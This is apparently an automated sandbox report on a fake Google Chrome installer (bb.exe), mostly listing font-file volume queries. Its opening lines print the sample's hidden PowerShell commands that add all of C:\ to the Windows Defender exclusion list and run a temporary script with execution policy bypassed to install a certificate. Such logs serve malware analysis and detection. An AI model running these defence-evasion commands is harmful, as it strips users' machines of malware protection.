            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user~1\AppData\Local\Temp\pssD8.ps1" -manufacturer "Google LLC" -pass "aicD7.pfx" -pfxPath "C:\Users\user~1\AppData\Local\Temp\aicD7.pfx"
            Adds extensions / path to Windows Defender exclusion list
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -WindowStyle Hidden -Command "Set-MpPreference -ExclusionPath" C:\
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -WindowStyle Hidden -Command "Set-MpPreference -ExclusionPath" C:\
            Source: C:\Users\user\Desktop\bb.exeProcess created: C:\Users\user\Desktop\bb.exe c:\users\user\desktop\bb.exe" /i "c:\users\user\appdata\roaming\google llc\google chrome 116.0.596.10\install\google chrome.msi" ai_euimsi=1 appdir="c:\program files\google llc\google chrome" shortcutdir="c:\programdata\microsoft\windows\start menu\programs\google chrome" secondsequence="1" clientprocessid="6524" chaineruiprocessid="6524chainer" action="install" executeaction="install" clientuilevel="0" addlocal="mainfeature" primaryfolder="appdir" rootdrive="c:\" ai_setupexepath="c:\users\user\desktop\bb.exe" setupexedir="c:\users\user\desktop\" exe_cmd_line="/exenoupdates /forcecleanup /wintime 1694097598 " ai_setupexepath_original="c:\users\user\desktop\bb.exe" targetdir="c:\" ai_install="1
            Source: C:\Users\user\Desktop\bb.exeProcess created: C:\Users\user\Desktop\bb.exe c:\users\user\desktop\bb.exe" /i "c:\users\user\appdata\roaming\google llc\google chrome 116.0.596.10\install\google chrome.msi" ai_euimsi=1 appdir="c:\program files\google llc\google chrome" shortcutdir="c:\programdata\microsoft\windows\start menu\programs\google chrome" secondsequence="1" clientprocessid="6524" chaineruiprocessid="6524chainer" action="install" executeaction="install" clientuilevel="0" addlocal="mainfeature" primaryfolder="appdir" rootdrive="c:\" ai_setupexepath="c:\users\user\desktop\bb.exe" setupexedir="c:\users\user\desktop\" exe_cmd_line="/exenoupdates /forcecleanup /wintime 1694097598 " ai_setupexepath_original="c:\users\user\desktop\bb.exe" targetdir="c:\" ai_install="1Jump to behavior
            Source: C:\Users\user\Desktop\bb.exeProcess created: C:\Users\user\Desktop\bb.exe C:\Users\user\Desktop\bb.exe" /i "C:\Users\user\AppData\Roaming\Google LLC\Google Chrome 116.0.596.10\install\Google Chrome.msi" AI_EUIMSI=1 APPDIR="C:\Program Files\Google LLC\Google Chrome" SHORTCUTDIR="C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome" SECONDSEQUENCE="1" CLIENTPROCESSID="6524" CHAINERUIPROCESSID="6524Chainer" ACTION="INSTALL" EXECUTEACTION="INSTALL" CLIENTUILEVEL="0" ADDLOCAL="MainFeature" PRIMARYFOLDER="APPDIR" ROOTDRIVE="C:\" AI_SETUPEXEPATH="C:\Users\user\Desktop\bb.exe" SETUPEXEDIR="C:\Users\user\Desktop\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1694097598 " AI_SETUPEXEPATH_ORIGINAL="C:\Users\user\Desktop\bb.exe" TARGETDIR="C:\" AI_INSTALL="1Jump to behavior
            Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\user~1\AppData\Local\Temp\pssD8.ps1" -manufacturer "Google LLC" -pass "aicD7.pfx" -pfxPath "C:\Users\user~1\AppData\Local\Temp\aicD7.pfx"Jump to behavior
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -WindowStyle Hidden -Command "Set-MpPreference -ExclusionPath" C:\
            Source: C:\Program Files\Google LLC\Google Chrome\setup.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe" -NoProfile -NonInteractive -NoLogo -Command "Get-Culture | Select -ExpandProperty DisplayName
            Source: C:\Users\user\Desktop\bb.exeCode function: 4_2_00DB72E0 GetCurrentProcess,OpenProcessToken,GetLastError,GetTokenInformation,GetTokenInformation,GetLastError,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,GetLastError,FindCloseChangeNotification,4_2_00DB72E0
            Source: C:\Users\user\Desktop\bb.exeCode function: GetLocaleInfoW,4_2_00E89D47
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\seguisli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\seguili.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\seguisbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\seguibl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\seguibli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\seguiemj.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\seguisym.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\bb.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformationJump to behavior
